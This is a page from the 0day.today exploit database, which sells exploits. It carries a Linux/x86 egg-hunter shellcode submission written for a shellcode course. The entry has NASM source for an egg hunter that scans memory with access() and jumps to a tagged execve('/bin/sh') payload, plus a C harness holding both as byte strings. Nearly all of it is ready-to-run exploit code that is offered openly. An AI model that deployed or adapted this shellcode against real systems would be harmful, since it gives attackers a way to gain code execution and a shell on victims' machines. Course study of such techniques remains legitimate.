0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - EggHunter + access() Shellcode (38 bytes)
/* ; Filename: egghunter.nasm ; Author: Paolo Perego <paolo@codiceinsicuro.it> ; Website: https://codiceinsicuro.it ; Blog post: https://codiceinsicuro.it/slae/ ; Twitter: @thesp0nge ; SLAE-ID: 1217 ; Purpose: This is the first stage of our payload. An egg-hunter shellcode ; looping through memory and jumping on the payload after the ; second egg found in memory. global _start section .text _start: xor ecx, ecx mul ecx next_page: or dx, 0xfff next_addr: ; EDX is 4096 here, that is the value of PAGE_SIZE constant inc edx ; EBX is our memory cursor lea ebx, [edx+0x4] xor eax, eax ; access is defined as #define __NR_acces 33 in ; /usr/include/i386-linux-gnu/asm/unistd_32.h: ; ; system call prototype is: ; int access(const char *pathname, int mode); mov al, 0x21 int 0x80 cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register ; has this value, a signal for a invalid page ; access it has been received jz next_page mov eax, key mov edi, edx scasd jnz next_addr scasd jnz next_addr ; At this point we are at the very beginning of our shellcode, after ; the second key. We can jump to it jmp edi section .data key equ 0xdeadbeef ; Filename: execve.nasm ; Author: Paolo Perego <paolo@codiceinsicuro.it> ; Website: https://codiceinsicuro.it ; Blog post: https://codiceinsicuro.it/slae/ ; Twitter: @thesp0nge ; SLAE-ID: 1217 ; Purpose: This is the default payload for the egg hunter demo. It will ; execute "/bin/sh" using execve() system call. global _start dd 0xdeadbeef dd 0xdeadbeef section .text _start: xor eax, eax ; init EAX to 0 push eax ; pushing 0 to the stack to be used as NULL pointer ; execve is defined as #define __NR_execve 11 in ; /usr/include/i386-linux-gnu/asm/unistd_32.h: ; ; system call prototype is: ; int execve(const char *filename, char *const argv[], char *const envp[]); push 0x68732f2f ; pushing //bin/sh into the stack push 0x6e69622f ; the init double / is for alignment purpose mov ebx, esp ; pointer to *filename push eax ; pushing in the stack a pointer to NULL mov edx, esp ; I don't care about environment here push eax mov ecx, esp ; I don't even care about passing arguments to ; my /bin/sh mov al, 0xb ; execve = 11 int 0x80 */ #include<stdio.h> #include<string.h> unsigned char egg_hunter[] = \ "\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x31\xc0\xb0\x21\xcd\x80\x3c\xf2\x74\xed\xb8\xef\xbe\xad\xde\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7"; unsigned char code[] = \ "\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80"; int main(int argc, char **argv) { printf("Shellcode Length: %d\n", strlen(code)); printf("Egghunter Length: %d\n", strlen(egg_hunter)); int (*ret)() = (int(*)())egg_hunter; ret(); } -- $ cd /pub $ more beer I pirati della sicurezza applicativa: https://codiceinsicuro.it # 0day.today [2024-12-25] #